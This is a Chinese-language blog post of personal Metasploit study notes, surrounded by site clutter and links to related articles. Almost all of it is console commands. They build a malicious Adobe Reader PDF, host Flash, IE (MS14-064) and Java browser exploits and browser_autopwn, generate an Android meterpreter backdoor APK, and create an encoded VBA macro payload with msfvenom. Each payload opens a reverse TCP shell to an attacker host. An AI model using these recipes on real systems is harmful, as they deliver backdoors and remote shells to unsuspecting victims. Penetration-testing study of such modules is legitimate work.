MSF学习笔记(9)

最新推荐文章于 2024-04-24 11:33:24 发布
最新推荐文章于 2024-04-24 11:33:24 发布
阅读量571 收藏 6
点赞数
分类专栏: MSF学习笔记 文章标签: msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tianyazm/article/details/78739608
版权

利用adobe reader漏洞执行payload
构造pdf文件

msf > use exploit/windows/fileformat/adobe_utilprintf 
msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set lhost 1.1.1.1
msf exploit(adobe_utilprintf) > exploit

利用网址构造

msf > use exploit/windows/browser/adobe_utilprintf 
msf exploit(adobe_utilprintf) > set srvport 80
msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set lhost 192.168.56.103
msf exploit(adobe_utilprintf) > set lport 4445
msf exploit(adobe_utilprintf) > set uripath /pdf

flash利用

msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf 
msf > use exploit/multi/browser/adobe_flash_opaque_background_uaf

浏览器自动利用

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set srvport 80
msf auxiliary(browser_autopwn) > set uripath /
msf auxiliary(browser_autopwn) > run

IE浏览器漏洞

msf > use exploit/windows/browser/ms14_064_ole_code_execution

jre利用漏洞

msf > use exploit/multi/browser/java_jre17_driver_manager 
msf > use exploit/multi/browser/java_jre17_jmxbean
msf > use exploit/multi/browser/java_jre17_reflection_types

android后门程序生成

msf > use payload/android/meterpreter/reverse_tcp 
msf payload(reverse_tcp) > set lhost 1.1.1.1
msf payload(reverse_tcp) > generate -f a.apk -p android -t raw

宏代码生成

root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe
tianyazm
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
MSF学习笔记
尐猴子君ii的博客
06-21 814
贵有恒何必三更眠五更起,最无益只怕一日曝十日寒 话不多说,上干货。 MSF主要模块 渗透模块(exploit):运行时会利用目标主机漏洞进行攻击。 攻击载荷模块(payload):在成功对目标完成一次渗透之后,这段程序开始在目标主机上运行,帮助我们获取需要的访问和行动权限。 辅助模块(auxiliary):包含一系列辅助支持模块,包括扫描模块、fuzz测试漏洞发掘模块、网络协议欺骗以及其他一些模块。 编码器模块(encoder):通常用来对我们的攻击模块进行代码混淆,来逃过目标的安全保护机制的检测。目标的安
msf笔记
u012795264的博客
12-21 668
msf目录结构data:包含meterpreter,passiveX,VNC DLLs,和一些用户接口代码 msfweb,插件用到的文件 documentiation:包含msf的文档,ruby脚本,msf的API文档 external:包含meterpreter,vnc和passivex payload源码 lib:包含msf使用的ruby库 modules:包含exploits,payl
MS14-064/CVE-2014-6332漏洞复现(OLE远程代码执行漏洞、IE浏览器漏洞)
最新发布
m0_74168970的博客
04-24 377
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏览器漏洞,Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用Internet Explorer浏览器查看该网站的时允许远程执行代码。show options:查看需要设置的地方。
MSF学习笔记(8)
Shadow 爬爬记
12-05 315
payload 生成windows 执行payload生成msfvenom --payload-options -p windows/shell/reverse_tcp ##查看需要配置的options msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00"
微软MSF框架学习笔记(9)
老熊的专栏
10-09 657
MSF计划阶段概览目标:创建解决方案的体系结构和设计方案、项目计划和进度表团队重点    尽可能早的发现尽可能多的问题    知道项目何时收集到足够的信息已向前推进工作在设计过程中,编写功能说明,准备工作计划,成本估算和时刻表MSF计划阶段的里程碑和交付成果交付成果    功能规格说明书    主项目计划    主项目进度表风险管理和里程碑复查报告也是在整个计划阶段中,项目组成员的任务就是编制
MSF技术总结
05-07
MSF 技术总结 MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 ...
kali 渗透msf
11-14
kali渗透测试利器
无人驾驶算法学习:多传感器融合MSF算法
01-28
无人驾驶技术在近年来得到了快速发展,其中多传感器融合(MSF)算法是实现高精度定位和导航的关键技术之一。本文主要探讨了基于误差状态的卡尔曼滤波(EKF)的MSF算法,特别是在相机和惯性测量单元(IMU)融合方面的...
学习笔记msf的使用
chualam的博客
10-29 263
目标主机:2003rs2 漏洞:cve-2017-7269 ms17-010 exp搜索 : search cve-xxx 利用:use exp名称 看配置:show options 配置:set 配置名 一个值 设置payload:set payload windows/meterpreter/reverse_tcp(反弹shell) 最终攻击:exploit 把shell放后台:background 交互:session -l 然后 session -i 1 添加路由攻击内网:run autoroute
MS14-064(OLE远程代码执行漏洞复现)
Martin-share的博客
02-11 2239
MS14-064(OLE远程代码执行漏洞复现)
渗透测试学习笔记(metasploit)
hklearner的博客
02-21 3371
METASPLOIT exploit-db.com •Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。 渗透攻击(exploit) 测试者利用系统,程序,或服务的漏洞进行攻击的一个过程。 攻击载荷(payload) 攻击者在目标系统上执行的一段攻击代码,该代码具有返弹连接,创建用户,执行其他系统命令的
msf完整渗透测试
clayzx的博客
11-15 6535
从生成shell到远程连接 前言: 本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole提供一个资料参考。不说废话了,以下是我们这篇的目标: 1.生成shell 2.上shell 3.监听 4.拿到会话 5.提权 6.拿到密码 7.远程连接 首先此次实验需要准备一台kali的虚拟机和一台windows 7的
客户端渗透之——浏览器渗透
冰河的专栏
01-24 2157
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86632106 攻击机: Kali 192.168.175.128 靶机: WinXP 192.168.175.130 1.Browser autopwn攻击 Metasploit中提供了一个browser autopwn模块,这是一个可以用来对各种浏览器进行测试和渗透的自...
kali-msfconsole:演示-浏览器缓冲区溢出攻击
xianjie0318的博客
12-10 1912
测试机:windows7 32位 测试步骤: 准备Win7-X86并安装Flash18 如果安装提示不是最新版本,需要去注册表-删除HKEY—LOCAL—MACHINE\SOFTWARE\Macromedia\flashplayer\safeversions 中18以及以上的版本 安装后运行命令msfconsole msf5 > use exploit/multi/browser/adobe_flash_opaque_background_uaf [*] No payload configure.
MS14-064 漏洞测试入侵win7
aozhuo4755的博客
04-25 1870
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术, 远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本... metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_executi...
msf 渗透工具学习材料
08-20
学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值